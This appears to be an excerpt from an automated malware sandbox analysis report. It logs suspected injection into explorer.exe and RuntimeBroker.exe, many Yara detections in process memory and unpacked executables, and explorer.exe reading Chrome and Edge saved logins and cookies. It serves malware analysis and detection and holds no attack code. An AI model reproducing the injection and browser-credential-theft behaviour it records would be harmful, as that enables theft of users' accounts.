Source: C:\Windows\System32\control.exe |
Memory protected: C:\Windows\explorer.exe base: 7FF802BC1580 protect: page execute and read and write |
Jump to behavior |
Source: C:\Windows\System32\control.exe |
Memory protected: C:\Windows\explorer.exe base: 7FF802BC1580 protect: page execute read |
Jump to behavior |
Source: C:\Windows\explorer.exe |
Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580 protect: page execute and read and write |
|
Source: C:\Windows\explorer.exe |
Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580 protect: page execute read |
|
Source: C:\Windows\explorer.exe |
Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580 protect: page execute and read and write |
|
Source: C:\Windows\explorer.exe |
Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580 protect: page execute and read and write |
|
Source: C:\Windows\explorer.exe |
Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580 protect: page execute read |
|
Source: C:\Windows\explorer.exe |
Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580 protect: page execute and read and write |
|
Source: C:\Windows\explorer.exe |
Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580 protect: page execute and read and write |
|
Source: C:\Windows\explorer.exe |
Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580 protect: page execute read |
|
Source: C:\Windows\explorer.exe |
Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580 protect: page execute and read and write |
|
Source: C:\Windows\explorer.exe |
Memory protected: unknown base: 7FF802BC1580 protect: page execute and read and write |
|
Source: C:\Windows\explorer.exe |
Memory protected: unknown base: 7FF802BC1580 protect: page execute read |
|
Source: C:\Windows\explorer.exe |
Memory protected: unknown base: 7FF802BC1580 protect: page execute and read and write |
|
Source: Yara match |
File source: 00000025.00000003.466969074.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.322984868.000000000576C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.274118654.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000025.00000003.466321410.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.274312246.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000018.00000003.455935177.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.274347577.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000018.00000003.390731563.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000025.00000002.472945195.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.375671182.0000000006898000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.274283989.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.274051962.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.320061792.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.274249118.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000014.00000003.395315890.00000123276AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000024.00000002.783581138.000001F9BC102000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000018.00000003.390864637.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.274172697.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.322240934.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.274335301.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000018.00000002.485699109.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: rundll32.exe PID: 2284, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: powershell.exe PID: 6680, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: control.exe PID: 7000, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: RuntimeBroker.exe PID: 4440, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: rundll32.exe PID: 5180, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: RuntimeBroker.exe PID: 4724, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: RuntimeBroker.exe PID: 4960, type: MEMORYSTR |
Source: Yara match |
File source: 2.3.rundll32.exe.52f94a0.10.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.52f94a0.10.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.2.rundll32.exe.36d0000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.586a4a0.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.5916b40.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.586a4a0.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.58e94a0.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000018.00000000.389053919.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000018.00000000.388260255.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000024.00000000.486983679.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000002.443486378.00000000055EF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000025.00000000.462400330.0000015723930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000031.00000000.558152492.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000025.00000000.459537251.0000015723930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000024.00000000.477935242.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000031.00000000.564931591.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000025.00000000.457650173.0000015723930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000002D.00000000.534482367.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000024.00000000.471067441.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.442564309.00000000052F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000002D.00000000.515611246.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000031.00000000.554617664.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000002D.00000000.528687963.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000018.00000000.390009566.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.322078024.000000000586A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.322135875.00000000058E9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: C:\Windows\explorer.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000008 |
Source: C:\Windows\explorer.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000009 |
Source: C:\Windows\explorer.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000007 |
Source: C:\Windows\explorer.exe |
File opened: C:\Users\user\appdata\local\google\chrome\user data\default\login data |
Source: C:\Windows\explorer.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_00000a |
Source: C:\Windows\explorer.exe |
File opened: C:\Users\user\appData\local\microsoft\edge\user data\default\login data |
Source: C:\Windows\explorer.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_00000b |
Source: C:\Windows\explorer.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\index |
Source: C:\Windows\explorer.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_0 |
Source: C:\Windows\explorer.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_1 |
Source: C:\Windows\explorer.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_2 |
Source: C:\Windows\explorer.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_3 |
Source: C:\Windows\explorer.exe |
File opened: C:\Users\user\appdata\local\google\chrome\user data\default\cookies |
Source: C:\Windows\explorer.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000001 |
Source: C:\Windows\explorer.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000004 |
Source: C:\Windows\explorer.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000005 |
Source: C:\Windows\explorer.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000002 |
Source: Yara match |
File source: 00000025.00000003.466969074.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.322984868.000000000576C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.274118654.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000025.00000003.466321410.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.274312246.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000018.00000003.455935177.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.274347577.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000018.00000003.390731563.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000025.00000002.472945195.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.375671182.0000000006898000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.274283989.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.274051962.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.320061792.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.274249118.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000014.00000003.395315890.00000123276AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000024.00000002.783581138.000001F9BC102000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000018.00000003.390864637.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.274172697.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.322240934.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.274335301.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000018.00000002.485699109.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: rundll32.exe PID: 2284, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: powershell.exe PID: 6680, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: control.exe PID: 7000, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: RuntimeBroker.exe PID: 4440, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: rundll32.exe PID: 5180, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: RuntimeBroker.exe PID: 4724, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: RuntimeBroker.exe PID: 4960, type: MEMORYSTR |
Source: Yara match |
File source: 2.3.rundll32.exe.52f94a0.10.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.52f94a0.10.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.2.rundll32.exe.36d0000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.586a4a0.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.5916b40.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.586a4a0.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.58e94a0.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000018.00000000.389053919.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000018.00000000.388260255.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000024.00000000.486983679.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000002.443486378.00000000055EF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000025.00000000.462400330.0000015723930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000031.00000000.558152492.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000025.00000000.459537251.0000015723930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000024.00000000.477935242.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000031.00000000.564931591.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000025.00000000.457650173.0000015723930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000002D.00000000.534482367.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000024.00000000.471067441.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.442564309.00000000052F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000002D.00000000.515611246.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000031.00000000.554617664.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000002D.00000000.528687963.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000018.00000000.390009566.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.322078024.000000000586A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.322135875.00000000058E9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |